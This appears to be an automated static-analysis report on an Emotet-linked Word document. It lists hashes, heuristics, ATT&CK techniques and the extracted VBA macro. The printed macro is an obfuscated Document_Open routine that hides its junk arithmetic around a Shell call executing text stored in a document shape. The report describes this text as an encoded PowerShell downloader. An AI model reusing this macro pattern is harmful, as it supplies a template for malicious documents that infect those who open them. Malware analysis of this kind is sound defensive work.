Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 e38417b58ac64880…

MALICIOUS

Office (OLE)

Size: 66.4 KB
Created: 2018-11-06 19:20:00
Authoring application: Microsoft Office Word
First seen: 2018-11-13
MD5: 978d860c31d371536cb18ff04b4c4c0c
SHA-1: a38d9c92dc0745d0888afd063119c12dacec7586
SHA-256: e38417b58ac64880ae35cacfc0216ea1fb6577ea61237b8f84bcd08322fd3cc1
Risk Score: 210

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
T1059.001 PowerShell
T1566.001 Spearphishing Attachment

The sample contains a Document_Open VBA macro that attempts to execute a complex PowerShell command. That command decodes and decompresses a Base64-encoded string and executes the result as a further PowerShell command. The ClamAV detection and the heuristic firings strongly indicate this is a dropper for Emotet malware, most likely designed to download and execute a second-stage payload.

Heuristics (7)

  • ClamAV: Doc.Downloader.Sload-6743946-0 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Downloader.Sload-6743946-0
  • Suspicious cmd.exe invocation with execution flag (high, SC_STR_CMD)
  • Reference to PowerShell (high, SC_STR_POWERSHELL)
  • LOLBin token sequence in document text (high, SE_LOLBIN_RUN_COMMAND)
    Extracted document text contains a Windows script/execution tool name (PowerShell, mshta, cmd, rundll32, regsvr32, …) within 220 characters of a dangerous flag, command verb, or URL. This is a visible 'run this' instruction in HTML/PDF/RTF lure bodies, or — in macro-laden Office files — the macro's own string-pool entries appearing adjacent in extracted text.
  • VBA macros detected (medium, OLE_VBA_MACROS; 1 related finding)
    Document contains VBA macro code
  • Document_Open macro (low, OLE_VBA_DOCOPEN)
    Matched lines in script:
      Attribute VB_Customizable = True
      Private Sub Document_open()
      On Error Resume Next
  • Embedded URL (info, EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 1306 bytes
SHA-256: eeae01a79ed1f2164714949f0afb1ae4af1825c2096e438ede231aa6d630175f

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "iZDtoWhm"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On Error Resume Next
   DZXiQr = (AafHKz + JjSGw * zHPCtd + Wfiaf + JjcpvS + JQQVfN / (kcHFM + CdwJU))
   sZWbZL = WakHfl + mPIunn / (qMwso + WjZwi / sLvspj + NzQpRc + JVGtqY + kBMZik / (QqAmY + smqXTL))
   nZUrEb = obhtWo + jjquX / cTuYdN + djjSV + fGjvZ + DiMIv
   viFQh = (VPIZLo + iHuIjl + CvsXN + AInMr / (GDXPKt + UZZEi + pStzb + XOsXzp))
   HWwFP = FJTfwO + IAHrOX / IwwkR + TzPKwK + pMHjiD + EVmEz
   WpNcv = ahiGsj + OQtcr + zXsGK + iTXOf / Zdqvf + wIAwI + nFsOIz + uHiifi / (CRNODT + iSGYT + jjjKBP + TFTTK * PkPvu + QvJfu)
   ohEmlq = MSOXUh + VQzzu * (iERSX + NCpWB / YGbbOS + cVMwWs)
Const iILfwj = 215064006 - 215064006
Shell@ Shapes(1).TextFrame.TextRange.Text + vfMhziQk + PadmWvN, iILfwj
   cKiLl = sFlzhY + ISzaHl + RLLFh + BIopPr * (jioEi + PRZAI)
   botBiQ = hRIva + zSHKKT * qpqMdC + zjqAJ + fmGBd + RhBzbU
   FIPDZ = (itCRw + iIskQ / (iqFtid + wsWzrK + mbXss + QuJZjN * jzGWhJ + ZdALi))
   cbMtL = (vmCkz + ffnjfM / nMwmz + iFdIb / OGanT + jVGutz)
End Sub